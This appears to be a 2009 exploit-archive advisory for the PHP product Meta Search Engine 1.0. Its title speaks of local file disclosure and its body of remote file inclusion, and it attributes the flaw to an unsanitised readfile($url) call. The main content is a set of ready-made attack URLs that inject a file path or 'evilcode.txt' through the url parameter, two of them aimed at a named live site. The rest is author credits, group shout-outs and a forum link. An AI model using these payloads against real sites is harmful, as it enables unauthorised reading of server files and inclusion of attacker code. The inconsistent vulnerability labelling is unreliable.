[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Meta Search Engine Script (url) Local File Disclosure Vulnerability
# Published : 2009-07-21
# Author : Moudi
# Previous Title : phpDirectorySource (XSS/SQL) Multiple Remote Vulnerabilities
# Next Title : Silentum Guestbook 2.0.2 (silentum_guestbook.php) SQL Injection Vuln
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ | | | | / | | | |
/ _ | | | | / _ | |_| |
/ ___ | |___ | |___ / ___ | _ |
IN THE NAME OF /_/ _ |_____| |_____| /_/ _ |_| |_|
==============================================================================
[??] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
[??] Meta Search Engine 1.0 Remote File Inclusion
==============================================================================
[??] Script: [ Meta Search Engine 1.0 ]
[??] Language: [ PHP ]
[??] Download: [ http://www.mydlstore.com/product.php?productid=40826&cat=0&page=1 ]
[??] Founder: [ Moudi <m0udi@9.cn> ]
[??] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[??] Team: [ EvilWay ]
[??] Dork: [ OFF ]
[??] Price: [ USD 12.99 ]
[??] Site : [ https://security-shell.ws/forum.php ]
###########################################################################
===[ Exploit RFI + LIVE : vulnerability ]===
[??] http://www.site.com/patch/?url=[RFI]&file=Search
[??] http://www.site.com/patch/index.php?url=[RFI]&file=Search
[??] http://www.mydlstore.net/metasearch/?url=evilcode.txt?&file=Search
[??] http://www.mydlstore.net/metasearch/index.php?url=evilcode.txt?&file=Search
Author: Moudi
###########################################################################
note: readfile($url) is the issue, so fd
# www.Syue.com [2009-07-21]